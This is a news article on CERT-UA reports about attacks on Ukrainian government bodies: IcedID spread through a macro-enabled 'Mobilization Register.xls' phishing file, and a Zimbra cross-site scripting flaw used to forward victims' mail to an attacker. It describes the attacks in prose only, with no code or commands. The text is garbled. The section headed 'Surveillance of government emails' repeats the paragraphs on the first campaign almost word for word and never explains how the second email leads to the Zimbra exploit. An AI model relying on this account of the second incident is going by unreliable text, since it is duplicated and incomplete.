Hackers are launching new assaults against Ukrainian government entities, using Zimbra exploits and phishing attacks to spread the IcedID malware.
The new attacks were discovered by Ukraine’s Computer Emergency Response Team (CERT-UA), who linked the IcedID phishing assault to the UAC-0041 threat cluster, which had previously been linked to AgentTesla distribution, and the second to UAC-0097, a currently unknown actor.
Although the attributions are tentative, this is yet another example of hostile cyber-activity directed at Ukrainian organizations.
The threat actors’ purpose in both incidents is to acquire access to internal networks in order to conduct cyber-espionage on Ukraine’s most important government organizations.
IcedID is infecting state organizations
The first report details a campaign that distributed “Mobilization Register.xls” XLS documents to numerous people.
When the user opens the document, it asks them to “Enable the Content” for reading, which triggers a malicious macro to download and run a malicious file.
This is the GzipLoader virus, which gets the final payload, IcedID, and fetches, decrypts, and executes it (aka BankBot).
IcedID is a banking trojan that can be used to steal account credentials or as a loader for other malware such as Cobalt Strike, ransomware, wipers, and more.
Surveillance of government emails
The second report concerns an email sent to Ukrainian government organizations with photographs apparently from an event when President V. Zelensky congratulated soldiers of the Armed Forces.
The first report details a campaign to distribute “Mobilization Register.xls” XLS documents to numerous people.
When the user opens the document, it asks them to “Enable the Content” in order to read it, which causes a malicious macro to begin, downloading and running a malicious file.
The GzipLoader malware is responsible for retrieving, decrypting, and executing the final payload, IcedID (aka BankBot).
IcedID is a banking trojan that can be used to steal account information or as a loader for second-stage malware like Cobalt Strike, ransomware, wipers, and more.
This cross-site scripting flaw affects Zimbra Collaboration Suite versions 8.7 and older, allowing remote attackers to inject arbitrary web script or HTML into email attachments via the content-location header.
Zimbra is a cloud-based email and collaboration platform with features like instant messaging, contacts, video conferencing, file sharing, and cloud storage.
Exploiting the issue in this scenario adds a forwarding rule for the victim’s emails to a new address under the threat actor’s control, obviously enabling espionage.
It’s worth noting that Zimbra had an XSS issue earlier this year that affected the suite’s most recent 8.8.15 P29 & P30 editions.
Chinese threat actors extensively exploited this issue as a zero-day exploit, stealing the emails of European media and government institutions.
As a result, CERT-UA urges all Zimbra-using enterprises in Ukraine to upgrade to the newest available versions of the suite as soon as possible.
